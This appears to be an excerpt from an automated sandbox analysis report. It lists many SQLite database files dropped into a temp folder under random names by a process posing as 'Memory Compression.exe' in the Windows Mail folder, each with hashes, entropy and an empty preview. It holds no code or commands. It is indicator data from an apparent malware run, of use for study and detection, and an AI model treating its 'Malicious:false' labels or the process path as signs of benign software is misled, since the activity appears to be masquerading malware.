                                                                                                                                Process:C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):51200
                                                                                                                                Entropy (8bit):0.8746135976761988
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                                                                                                                MD5:9E68EA772705B5EC0C83C2A97BB26324
                                                                                                                                SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                                                                                                                SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                                                                                                                                SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                                                                                                                Malicious:false
                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                C:\Users\user\AppData\Local\Temp\ACltLP4OsE

                                                                                                                                Download File
                                                                                                                                Process:C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):106496
                                                                                                                                Entropy (8bit):1.136413900497188
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                                                                                                MD5:429F49156428FD53EB06FC82088FD324
                                                                                                                                SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                                                                                                SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                                                                                                SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                                                                                                Malicious:false
                                                                                                                                Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                C:\Users\user\AppData\Local\Temp\AK9yPFFbZ8

                                                                                                                                Download File
                                                                                                                                Process:C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):196608
                                                                                                                                Entropy (8bit):1.121297215059106
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                                                                                                MD5:D87270D0039ED3A5A72E7082EA71E305
                                                                                                                                SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                                                                                                SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                                                                                                SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                                                                                                Malicious:false
                                                                                                                                Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                C:\Users\user\AppData\Local\Temp\AQRCmr7jKc

                                                                                                                                Download File
                                                                                                                                Process:C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 4
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):20480
                                                                                                                                Entropy (8bit):0.8439810553697228
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:24:TLyAF1kwNbXYFpFNYcw+6UwcQVXH5fBO9p7n52GmCWGf+dyMDCFVE1:TeAFawNLopFgU10XJBOB2Gbf+ba+
                                                                                                                                MD5:9D46F142BBCF25D0D495FF1F3A7609D3
                                                                                                                                SHA1:629BD8CD800F9D5B078B5779654F7CBFA96D4D4E
                                                                                                                                SHA-256:C11B443A512184E82D670BA6F7886E98B03C27CC7A3CEB1D20AD23FCA1DE57DA
                                                                                                                                SHA-512:AC90306667AFD38F73F6017543BDBB0B359D79740FA266F587792A94FDD35B54CCE5F6D85D5F6CB7F4344BEDAD9194769ABB3864AAE7D94B4FD6748C31250AC2
                                                                                                                                Malicious:false
                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                C:\Users\user\AppData\Local\Temp\AYBBCYdyJb

                                                                                                                                Download File
                                                                                                                                Process:C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):20480
                                                                                                                                Entropy (8bit):0.5712781801655107
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                                MD5:05A60B4620923FD5D53B9204391452AF
                                                                                                                                SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                                                                SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                                                                SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                                                                Malicious:false
                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                C:\Users\user\AppData\Local\Temp\BFEUhGl5VD

                                                                                                                                Download File
                                                                                                                                Process:C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 4
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):20480
                                                                                                                                Entropy (8bit):0.8439810553697228
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:24:TLyAF1kwNbXYFpFNYcw+6UwcQVXH5fBO9p7n52GmCWGf+dyMDCFVE1:TeAFawNLopFgU10XJBOB2Gbf+ba+
                                                                                                                                MD5:9D46F142BBCF25D0D495FF1F3A7609D3
                                                                                                                                SHA1:629BD8CD800F9D5B078B5779654F7CBFA96D4D4E
                                                                                                                                SHA-256:C11B443A512184E82D670BA6F7886E98B03C27CC7A3CEB1D20AD23FCA1DE57DA
                                                                                                                                SHA-512:AC90306667AFD38F73F6017543BDBB0B359D79740FA266F587792A94FDD35B54CCE5F6D85D5F6CB7F4344BEDAD9194769ABB3864AAE7D94B4FD6748C31250AC2
                                                                                                                                Malicious:false
                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                C:\Users\user\AppData\Local\Temp\CBLLiqGa76

                                                                                                                                Download File
                                                                                                                                Process:C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):20480
                                                                                                                                Entropy (8bit):0.5707520969659783
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                                MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                                                                SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                                                                SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                                                                SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                                                                Malicious:false
                                                                                                                                Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                C:\Users\user\AppData\Local\Temp\CKH8WX9pwb

                                                                                                                                Download File
                                                                                                                                Process:C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):196608
                                                                                                                                Entropy (8bit):1.121297215059106
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                                                                                                MD5:D87270D0039ED3A5A72E7082EA71E305
                                                                                                                                SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                                                                                                SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                                                                                                SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                                                                                                Malicious:false
                                                                                                                                Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                C:\Users\user\AppData\Local\Temp\CNBb96eZzq

                                                                                                                                Download File
                                                                                                                                Process:C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):20480
                                                                                                                                Entropy (8bit):0.6732424250451717
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                                                                                                MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                                                                                                SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                                                                                                SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                                                                                                SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                                                                                                Malicious:false
                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                C:\Users\user\AppData\Local\Temp\CVVR5jwvJc

                                                                                                                                Download File
                                                                                                                                Process:C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):40960
                                                                                                                                Entropy (8bit):0.8553638852307782
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                Malicious:false
                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                C:\Users\user\AppData\Local\Temp\CzIP6mWfkA

                                                                                                                                Download File
                                                                                                                                Process:C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 4
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):20480
                                                                                                                                Entropy (8bit):0.8439810553697228
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:24:TLyAF1kwNbXYFpFNYcw+6UwcQVXH5fBO9p7n52GmCWGf+dyMDCFVE1:TeAFawNLopFgU10XJBOB2Gbf+ba+
                                                                                                                                MD5:9D46F142BBCF25D0D495FF1F3A7609D3
                                                                                                                                SHA1:629BD8CD800F9D5B078B5779654F7CBFA96D4D4E
                                                                                                                                SHA-256:C11B443A512184E82D670BA6F7886E98B03C27CC7A3CEB1D20AD23FCA1DE57DA
                                                                                                                                SHA-512:AC90306667AFD38F73F6017543BDBB0B359D79740FA266F587792A94FDD35B54CCE5F6D85D5F6CB7F4344BEDAD9194769ABB3864AAE7D94B4FD6748C31250AC2
                                                                                                                                Malicious:false
                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                C:\Users\user\AppData\Local\Temp\DEY54cS6yg

                                                                                                                                Download File
                                                                                                                                Process:C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):106496
                                                                                                                                Entropy (8bit):1.136413900497188
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                                                                                                MD5:429F49156428FD53EB06FC82088FD324
                                                                                                                                SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                                                                                                SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                                                                                                SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                                                                                                Malicious:false
                                                                                                                                Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                C:\Users\user\AppData\Local\Temp\DGAbC2nFz8

                                                                                                                                Download File
                                                                                                                                Process:C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):196608
                                                                                                                                Entropy (8bit):1.121297215059106
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                                                                                                MD5:D87270D0039ED3A5A72E7082EA71E305
                                                                                                                                SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                                                                                                SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                                                                                                SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                                                                                                Malicious:false
                                                                                                                                Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                C:\Users\user\AppData\Local\Temp\DxP4KnSK4S

                                                                                                                                Download File
                                                                                                                                Process:C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):106496
                                                                                                                                Entropy (8bit):1.136413900497188
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                                                                                                MD5:429F49156428FD53EB06FC82088FD324
                                                                                                                                SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                                                                                                SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                                                                                                SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                                                                                                Malicious:false
                                                                                                                                Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                C:\Users\user\AppData\Local\Temp\EABqnS9lqR

                                                                                                                                Download File
                                                                                                                                Process:C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):20480
                                                                                                                                Entropy (8bit):0.6732424250451717
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                                                                                                MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                                                                                                SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                                                                                                SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                                                                                                SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                                                                                                Malicious:false
                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                C:\Users\user\AppData\Local\Temp\EmZ4vYUAhF

                                                                                                                                Download File
                                                                                                                                Process:C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):196608
                                                                                                                                Entropy (8bit):1.121297215059106
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                                                                                                MD5:D87270D0039ED3A5A72E7082EA71E305
                                                                                                                                SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                                                                                                SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                                                                                                SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                                                                                                Malicious:false
                                                                                                                                Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                C:\Users\user\AppData\Local\Temp\EzmZhrWsNx

                                                                                                                                Download File
                                                                                                                                Process:C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):196608
                                                                                                                                Entropy (8bit):1.121297215059106
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                                                                                                MD5:D87270D0039ED3A5A72E7082EA71E305
                                                                                                                                SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                                                                                                SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                                                                                                SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                                                                                                Malicious:false
                                                                                                                                Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                C:\Users\user\AppData\Local\Temp\FSnOJEyM7G

                                                                                                                                Download File
                                                                                                                                Process:C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):20480
                                                                                                                                Entropy (8bit):0.5712781801655107
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                                MD5:05A60B4620923FD5D53B9204391452AF
                                                                                                                                SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                                                                SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                                                                SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                                                                Malicious:false
                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                C:\Users\user\AppData\Local\Temp\FpFMVzvdtC

                                                                                                                                Download File
                                                                                                                                Process:C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):106496
                                                                                                                                Entropy (8bit):1.136413900497188
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                                                                                                MD5:429F49156428FD53EB06FC82088FD324
                                                                                                                                SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                                                                                                SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                                                                                                SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                                                                                                Malicious:false
                                                                                                                                Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                C:\Users\user\AppData\Local\Temp\GE2BRUyOnA

                                                                                                                                Download File
                                                                                                                                Process:C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):106496
                                                                                                                                Entropy (8bit):1.136413900497188
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                                                                                                MD5:429F49156428FD53EB06FC82088FD324
                                                                                                                                SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                                                                                                SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                                                                                                SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                                                                                                Malicious:false
                                                                                                                                Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                C:\Users\user\AppData\Local\Temp\Gf8Nh9T3IL

                                                                                                                                Download File
                                                                                                                                Process:C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):106496
                                                                                                                                Entropy (8bit):1.136413900497188
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                                                                                                MD5:429F49156428FD53EB06FC82088FD324
                                                                                                                                SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                                                                                                SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                                                                                                SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                                                                                                Malicious:false
                                                                                                                                Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                C:\Users\user\AppData\Local\Temp\GiG7JE7QBV

                                                                                                                                Download File
                                                                                                                                Process:C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):196608
                                                                                                                                Entropy (8bit):1.121297215059106
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                                                                                                MD5:D87270D0039ED3A5A72E7082EA71E305
                                                                                                                                SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                                                                                                SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                                                                                                SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                                                                                                Malicious:false
                                                                                                                                Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                C:\Users\user\AppData\Local\Temp\GjIYFZvNwb

                                                                                                                                Download File
                                                                                                                                Process:C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):106496
                                                                                                                                Entropy (8bit):1.136413900497188
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                                                                                                MD5:429F49156428FD53EB06FC82088FD324
